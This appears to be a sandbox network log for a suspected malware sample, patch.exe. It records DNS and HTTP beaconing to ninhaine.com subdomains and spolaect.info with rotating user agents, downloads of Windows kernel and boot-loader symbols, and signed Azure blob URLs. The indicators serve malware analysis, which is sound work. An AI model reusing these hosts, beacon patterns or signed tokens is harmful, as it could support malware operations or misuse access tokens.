Remote address:8.8.8.8:53Request845d549f-5f7c-4d60-b3b5-523d34d5069e.ninhaine.comIN TXTResponse
-
Remote address:8.8.8.8:53Requestserver3.ninhaine.comIN AResponseserver3.ninhaine.comIN A46.8.8.145
-
Remote address:8.8.8.8:53Requestww53.ninhaine.comIN AResponseww53.ninhaine.comIN CNAMEg87442272.c.giantpanda.comg87442272.c.giantpanda.comIN A172.104.149.86g87442272.c.giantpanda.comIN A172.104.251.198g87442272.c.giantpanda.comIN A139.162.181.76
-
Remote address:172.104.149.86:80RequestGET / HTTP/1.1
Host: ww53.ninhaine.com
User-Agent: Go-http-client/1.1
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Wed, 25 Dec 2024 04:24:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: session_id=8b558589dd02bf6da942faa44dbf1443; Path=/; HttpOnly; Max-Age=86400; Expires=Wednesday, 25-Dec-2024 04:24:31 GMT
Content-Encoding: gzip
-
Remote address:8.8.8.8:53Requestww82.ninhaine.comIN AResponseww82.ninhaine.comIN CNAME63214.bodis.com63214.bodis.comIN A199.59.243.227
-
Remote address:199.59.243.227:80RequestGET / HTTP/1.1
Host: ww82.ninhaine.com
User-Agent: Go-http-client/1.1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1054
x-request-id: 3ec084da-3cd5-42ca-9199-9c56f1c58152
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Tt/J9oqHpuqXX6un3Cskdko3ntgD1EOja6YOeQ+8B1Hpbe2+JoOhWbyNcOz/GR92FxtaOj/IK4FrDZpNw9TExw==
set-cookie: parking_session=3ec084da-3cd5-42ca-9199-9c56f1c58152; expires=Wed, 25 Dec 2024 04:39:31 GMT; path=/
-
Remote address:199.59.243.227:80RequestGET / HTTP/1.1
Host: ww82.ninhaine.com
User-Agent: Go-http-client/1.1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1054
x-request-id: 14f477b6-1133-4bcf-9a10-09fa7090902c
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Tt/J9oqHpuqXX6un3Cskdko3ntgD1EOja6YOeQ+8B1Hpbe2+JoOhWbyNcOz/GR92FxtaOj/IK4FrDZpNw9TExw==
set-cookie: parking_session=14f477b6-1133-4bcf-9a10-09fa7090902c; expires=Wed, 25 Dec 2024 04:39:31 GMT; path=/
-
Remote address:199.59.243.227:80RequestGET / HTTP/1.1
Host: ww82.ninhaine.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1054
x-request-id: 0f451bd9-3354-4874-95f9-7d5a41aaf0f1
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cqF/aCyUDUpYH9bRcTd6IYEXmTLau4weff+Pczwzoe0nHGd2R66SBH1cwPi0zy+ts/t6XYd0DVjMusXvBCcnwA==
set-cookie: parking_session=0f451bd9-3354-4874-95f9-7d5a41aaf0f1; expires=Wed, 25 Dec 2024 04:39:35 GMT; path=/
-
Remote address:199.59.243.227:80RequestGET / HTTP/1.1
Host: ww82.ninhaine.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1054
x-request-id: c0a273bb-fb15-4816-a440-ee49ad322e4c
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_htDALpAU8ATBQQbBTuEUy44ePN8i14k7e70foW+XnsyNOWQ0iMYtMW7o209pSdcxn3wsBlX8Ue5Rz0otAqVfnQ==
set-cookie: parking_session=c0a273bb-fb15-4816-a440-ee49ad322e4c; expires=Wed, 25 Dec 2024 04:39:36 GMT; path=/
-
Remote address:199.59.243.227:80RequestGET / HTTP/1.1
Host: ww82.ninhaine.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1054
x-request-id: 985f102c-e539-4d85-a389-791d4b476efb
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kUQtL7LZJIzV/H4tJlrYiAbrmv50aiBGW4gGhclbxgD2fkqnWvoSJXSEMW8+fyni1HAlVsoOlGvfXjLhv7qpNQ==
set-cookie: parking_session=985f102c-e539-4d85-a389-791d4b476efb; expires=Wed, 25 Dec 2024 04:39:39 GMT; path=/
-
Remote address:199.59.243.227:80RequestGET / HTTP/1.1
Host: ww82.ninhaine.com
User-Agent: Go-http-client/1.1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1054
x-request-id: b46e3bc7-3784-48a9-a2ed-15ecaa3fc50e
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Tt/J9oqHpuqXX6un3Cskdko3ntgD1EOja6YOeQ+8B1Hpbe2+JoOhWbyNcOz/GR92FxtaOj/IK4FrDZpNw9TExw==
set-cookie: parking_session=b46e3bc7-3784-48a9-a2ed-15ecaa3fc50e; expires=Wed, 25 Dec 2024 04:39:39 GMT; path=/
-
Remote address:8.8.8.8:53Requestmsdl.microsoft.comIN AResponsemsdl.microsoft.comIN CNAMEmsdl.microsoft.akadns.netmsdl.microsoft.akadns.netIN CNAMEmsdl-microsoft-com.a-0016.a-msedge.netmsdl-microsoft-com.a-0016.a-msedge.netIN CNAMEa-0016.a-msedge.neta-0016.a-msedge.netIN A204.79.197.219
-
Remote address:204.79.197.219:443RequestGET /download/symbols/index2.txt HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: msdl.microsoft.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Strict-Transport-Security: includeSubDomains
X-MSEdge-Ref: Ref A: E834F3F3DE634A42AD5F029A3D988FF8 Ref B: LON04EDGE1118 Ref C: 2024-12-25T04:24:34Z
Date: Wed, 25 Dec 2024 04:24:33 GMT
Content-Length: 0
-
GEThttps://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdbpatch.exeRemote address:204.79.197.219:443RequestGET /download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: msdl.microsoft.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 302 Found
X-Cache: TCP_MISS
Strict-Transport-Security: includeSubDomains
X-MSEdge-Ref: Ref A: 4092804928EA4D0783C5593CA3880547 Ref B: LON04EDGE1118 Ref C: 2024-12-25T04:24:34Z
Date: Wed, 25 Dec 2024 04:24:33 GMT
Content-Length: 0
-
GEThttps://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdbpatch.exeRemote address:204.79.197.219:443RequestGET /download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: msdl.microsoft.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 302 Found
X-Cache: TCP_HIT
Strict-Transport-Security: includeSubDomains
X-MSEdge-Ref: Ref A: 142603410C934107B7656A428FB98B84 Ref B: LON04EDGE1118 Ref C: 2024-12-25T04:24:46Z
Date: Wed, 25 Dec 2024 04:24:46 GMT
Content-Length: 0
-
Remote address:204.79.197.219:443RequestGET /download/symbols/index2.txt HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: msdl.microsoft.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Strict-Transport-Security: includeSubDomains
X-MSEdge-Ref: Ref A: A091FDF5055B4F25A0C48E70322E865E Ref B: LON04EDGE1118 Ref C: 2024-12-25T04:24:57Z
Date: Wed, 25 Dec 2024 04:24:57 GMT
Content-Length: 0
-
GEThttps://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdbpatch.exeRemote address:204.79.197.219:443RequestGET /download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: msdl.microsoft.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 302 Found
X-Cache: TCP_MISS
Strict-Transport-Security: includeSubDomains
X-MSEdge-Ref: Ref A: CF0245B8782D4671AD1FB0440BAEFEA5 Ref B: LON04EDGE1118 Ref C: 2024-12-25T04:24:57Z
Date: Wed, 25 Dec 2024 04:24:57 GMT
Content-Length: 0
-
GEThttps://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdbpatch.exeRemote address:204.79.197.219:443RequestGET /download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: msdl.microsoft.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 302 Found
X-Cache: TCP_HIT
Strict-Transport-Security: includeSubDomains
X-MSEdge-Ref: Ref A: 82BC7168536E4266A825E93A89D80A0B Ref B: LON04EDGE1118 Ref C: 2024-12-25T04:24:59Z
Date: Wed, 25 Dec 2024 04:24:58 GMT
Content-Length: 0
-
Remote address:8.8.8.8:53Requestvsblobprodscussu5shard30.blob.core.windows.netIN AResponsevsblobprodscussu5shard30.blob.core.windows.netIN CNAMEblob.sat09prdstrz08a.store.core.windows.netblob.sat09prdstrz08a.store.core.windows.netIN CNAMEblob.sat09prdstrz08a.trafficmanager.netblob.sat09prdstrz08a.trafficmanager.netIN A20.150.38.228blob.sat09prdstrz08a.trafficmanager.netIN A20.150.70.36blob.sat09prdstrz08a.trafficmanager.netIN A20.150.79.68
-
GEThttps://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=3UpCFLLohJBv6fYD47rr89qUp6hbrNh9jURupMeCcbM%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T02%3A49%3A09Z&ske=2024-12-27T03%3A49%3A09Z&sks=b&skv=2019-07-07&se=2024-12-26T04%3A19%3A29Z&sp=r&rscl=x-e2eid-c32417c5-144b4ca6-93d1b868-70da201b-session-67043d7f-3327490a-be498c32-8683bc9dpatch.exeRemote address:20.150.38.228:443RequestGET /b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=3UpCFLLohJBv6fYD47rr89qUp6hbrNh9jURupMeCcbM%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T02%3A49%3A09Z&ske=2024-12-27T03%3A49%3A09Z&sks=b&skv=2019-07-07&se=2024-12-26T04%3A19%3A29Z&sp=r&rscl=x-e2eid-c32417c5-144b4ca6-93d1b868-70da201b-session-67043d7f-3327490a-be498c32-8683bc9d HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Connection: Keep-Alive
Cache-Control: no-cache
Host: vsblobprodscussu5shard30.blob.core.windows.net
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Language: x-e2eid-c32417c5-144b4ca6-93d1b868-70da201b-session-67043d7f-3327490a-be498c32-8683bc9d
Last-Modified: Mon, 12 Jun 2017 21:34:21 GMT
Accept-Ranges: bytes
ETag: "0x8D4B1DACA398C54"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6c83503b-801e-0076-2384-56dc40000000
x-ms-version: 2019-07-07
x-ms-creation-time: Fri, 05 May 2017 08:24:14 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
x-ms-server-encrypted: true
Access-Control-Expose-Headers: Content-Length
Access-Control-Allow-Origin: *
Date: Wed, 25 Dec 2024 04:24:34 GMT
-
GEThttps://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=3UpCFLLohJBv6fYD47rr89qUp6hbrNh9jURupMeCcbM%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T02%3A49%3A09Z&ske=2024-12-27T03%3A49%3A09Z&sks=b&skv=2019-07-07&se=2024-12-26T04%3A19%3A29Z&sp=r&rscl=x-e2eid-c32417c5-144b4ca6-93d1b868-70da201b-session-67043d7f-3327490a-be498c32-8683bc9dpatch.exeRemote address:20.150.38.228:443RequestGET /b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=3UpCFLLohJBv6fYD47rr89qUp6hbrNh9jURupMeCcbM%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T02%3A49%3A09Z&ske=2024-12-27T03%3A49%3A09Z&sks=b&skv=2019-07-07&se=2024-12-26T04%3A19%3A29Z&sp=r&rscl=x-e2eid-c32417c5-144b4ca6-93d1b868-70da201b-session-67043d7f-3327490a-be498c32-8683bc9d HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Connection: Keep-Alive
Cache-Control: no-cache
Host: vsblobprodscussu5shard30.blob.core.windows.net
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Language: x-e2eid-c32417c5-144b4ca6-93d1b868-70da201b-session-67043d7f-3327490a-be498c32-8683bc9d
Last-Modified: Mon, 12 Jun 2017 21:34:21 GMT
Accept-Ranges: bytes
ETag: "0x8D4B1DACA398C54"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6c836477-801e-0076-4a84-56dc40000000
x-ms-version: 2019-07-07
x-ms-creation-time: Fri, 05 May 2017 08:24:14 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
x-ms-server-encrypted: true
Access-Control-Expose-Headers: Content-Length
Access-Control-Allow-Origin: *
Date: Wed, 25 Dec 2024 04:24:46 GMT
-
Remote address:172.104.149.86:80RequestGET / HTTP/1.1
Host: ww53.ninhaine.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Edg/80.0.361.69
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Wed, 25 Dec 2024 04:24:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: session_id=c2646ec458c6dcb8abd1dbfd5f6dff18; Path=/; HttpOnly; Max-Age=86400; Expires=Wednesday, 25-Dec-2024 04:24:38 GMT
Content-Encoding: gzip
-
Remote address:8.8.8.8:53Requestvsblobprodscussu5shard20.blob.core.windows.netIN AResponsevsblobprodscussu5shard20.blob.core.windows.netIN CNAMEblob.sat09prdstrz08a.store.core.windows.netblob.sat09prdstrz08a.store.core.windows.netIN CNAMEblob.sat09prdstrz08a.trafficmanager.netblob.sat09prdstrz08a.trafficmanager.netIN A20.150.70.36blob.sat09prdstrz08a.trafficmanager.netIN A20.150.38.228blob.sat09prdstrz08a.trafficmanager.netIN A20.150.79.68
-
GEThttps://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=fbiR%2FAoUtr4Yr5cCbtF8Jq%2FvPQpO4WAU%2FzT5H47sbs0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T01%3A20%3A22Z&ske=2024-12-27T02%3A20%3A22Z&sks=b&skv=2019-07-07&se=2024-12-26T05%3A04%3A39Z&sp=r&rscl=x-e2eid-516686d6-a0884684-92c5e632-712025a1-session-6707c337-3327490a-be498c32-8683bc9dpatch.exeRemote address:20.150.70.36:443RequestGET /b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=fbiR%2FAoUtr4Yr5cCbtF8Jq%2FvPQpO4WAU%2FzT5H47sbs0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T01%3A20%3A22Z&ske=2024-12-27T02%3A20%3A22Z&sks=b&skv=2019-07-07&se=2024-12-26T05%3A04%3A39Z&sp=r&rscl=x-e2eid-516686d6-a0884684-92c5e632-712025a1-session-6707c337-3327490a-be498c32-8683bc9d HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Connection: Keep-Alive
Cache-Control: no-cache
Host: vsblobprodscussu5shard20.blob.core.windows.net
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Language: x-e2eid-516686d6-a0884684-92c5e632-712025a1-session-6707c337-3327490a-be498c32-8683bc9d
Last-Modified: Fri, 02 Feb 2024 04:23:06 GMT
Accept-Ranges: bytes
ETag: "0x8DC23A6A7A80D5E"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 76f3b283-701e-0054-6584-560618000000
x-ms-version: 2019-07-07
x-ms-creation-time: Fri, 02 Feb 2024 04:23:06 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
x-ms-server-encrypted: true
Access-Control-Expose-Headers: Content-Length
Access-Control-Allow-Origin: *
Date: Wed, 25 Dec 2024 04:24:57 GMT
-
GEThttps://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=fbiR%2FAoUtr4Yr5cCbtF8Jq%2FvPQpO4WAU%2FzT5H47sbs0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T01%3A20%3A22Z&ske=2024-12-27T02%3A20%3A22Z&sks=b&skv=2019-07-07&se=2024-12-26T05%3A04%3A39Z&sp=r&rscl=x-e2eid-516686d6-a0884684-92c5e632-712025a1-session-6707c337-3327490a-be498c32-8683bc9dpatch.exeRemote address:20.150.70.36:443RequestGET /b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=fbiR%2FAoUtr4Yr5cCbtF8Jq%2FvPQpO4WAU%2FzT5H47sbs0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T01%3A20%3A22Z&ske=2024-12-27T02%3A20%3A22Z&sks=b&skv=2019-07-07&se=2024-12-26T05%3A04%3A39Z&sp=r&rscl=x-e2eid-516686d6-a0884684-92c5e632-712025a1-session-6707c337-3327490a-be498c32-8683bc9d HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Connection: Keep-Alive
Cache-Control: no-cache
Host: vsblobprodscussu5shard20.blob.core.windows.net
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Language: x-e2eid-516686d6-a0884684-92c5e632-712025a1-session-6707c337-3327490a-be498c32-8683bc9d
Last-Modified: Fri, 02 Feb 2024 04:23:06 GMT
Accept-Ranges: bytes
ETag: "0x8DC23A6A7A80D5E"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 76f3b43d-701e-0054-6f84-560618000000
x-ms-version: 2019-07-07
x-ms-creation-time: Fri, 02 Feb 2024 04:23:06 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
x-ms-server-encrypted: true
Access-Control-Expose-Headers: Content-Length
Access-Control-Allow-Origin: *
Date: Wed, 25 Dec 2024 04:24:58 GMT
-
Remote address:199.59.243.227:80RequestGET / HTTP/1.1
Host: ww82.ninhaine.com
User-Agent: Go-http-client/1.1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1054
x-request-id: a5a658ec-2f8c-46c4-b4df-93b1dec29ceb
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Tt/J9oqHpuqXX6un3Cskdko3ntgD1EOja6YOeQ+8B1Hpbe2+JoOhWbyNcOz/GR92FxtaOj/IK4FrDZpNw9TExw==
set-cookie: parking_session=a5a658ec-2f8c-46c4-b4df-93b1dec29ceb; expires=Wed, 25 Dec 2024 04:40:00 GMT; path=/
-
Remote address:172.104.149.86:80RequestGET / HTTP/1.1
Host: ww53.ninhaine.com
User-Agent: Go-http-client/1.1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Wed, 25 Dec 2024 04:25:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: session_id=2d8d10064961bda0e12e4d345349eb56; Path=/; HttpOnly; Max-Age=86400; Expires=Wednesday, 25-Dec-2024 04:25:00 GMT
Content-Encoding: gzip
-
Remote address:8.8.8.8:53Requestcrl.microsoft.comIN AResponsecrl.microsoft.comIN CNAMEcrl.www.ms.akadns.netcrl.www.ms.akadns.netIN CNAMEa1363.dscg.akamai.neta1363.dscg.akamai.netIN A88.221.134.83a1363.dscg.akamai.netIN A88.221.134.146
-
Remote address:88.221.134.83:80RequestGET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 11 Jul 2024 01:45:51 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-MD5: +oTkvMkqpdtzWrUHEQQM3g==
Last-Modified: Thu, 12 Dec 2024 00:06:56 GMT
ETag: 0x8DD1A40E476D877
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 729f9bbc-001e-0005-142b-4c8531000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 25 Dec 2024 04:25:04 GMT
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestwww.microsoft.comIN AResponsewww.microsoft.comIN CNAMEwww.microsoft.com-c-3.edgekey.netwww.microsoft.com-c-3.edgekey.netIN CNAMEwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netIN CNAMEe13678.dscb.akamaiedge.nete13678.dscb.akamaiedge.netIN A95.100.245.144
-
Remote address:95.100.245.144:80RequestGET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sun, 18 Aug 2024 00:23:49 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-MD5: PjrtHAukbJio72s77Ag5mA==
Last-Modified: Thu, 31 Oct 2024 23:26:09 GMT
ETag: 0x8DCFA0366D6C4CA
x-ms-request-id: 7ca9c103-d01e-0016-3fee-2ba13d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 25 Dec 2024 04:25:04 GMT
Connection: keep-alive
TLS_version: UNKNOWN
ms-cv: CASMicrosoftCV646aba5c.0
ms-cv-esi: CASMicrosoftCV646aba5c.0
X-RTag: RT
-
Remote address:8.8.8.8:53Requestspolaect.infoIN AResponse
-
Remote address:172.104.149.86:80RequestGET / HTTP/1.1
Host: ww53.ninhaine.com
User-Agent: Go-http-client/1.1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Wed, 25 Dec 2024 04:25:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: session_id=c5898d27d1cbad19447e7d4f0a843303; Path=/; HttpOnly; Max-Age=86400; Expires=Wednesday, 25-Dec-2024 04:25:08 GMT
Content-Encoding: gzip
-
Remote address:172.104.149.86:80RequestGET / HTTP/1.1
Host: ww53.ninhaine.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Wed, 25 Dec 2024 04:26:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: session_id=f17088d6a9313ad195f8ba407a19cbe0; Path=/; HttpOnly; Max-Age=86400; Expires=Wednesday, 25-Dec-2024 04:26:05 GMT
Content-Encoding: gzip
-
830 B 3.5kB 10 8
-
16.5kB 5.6kB 49 43
-
421 B 1.5kB 6 5
HTTP Request
GET http://ww53.ninhaine.com/HTTP Response
200 -
2.0kB 13.4kB 22 22
HTTP Request
GET http://ww82.ninhaine.com/HTTP Response
200HTTP Request
GET http://ww82.ninhaine.com/HTTP Response
200HTTP Request
GET http://ww82.ninhaine.com/HTTP Response
200HTTP Request
GET http://ww82.ninhaine.com/HTTP Response
200HTTP Request
GET http://ww82.ninhaine.com/HTTP Response
200HTTP Request
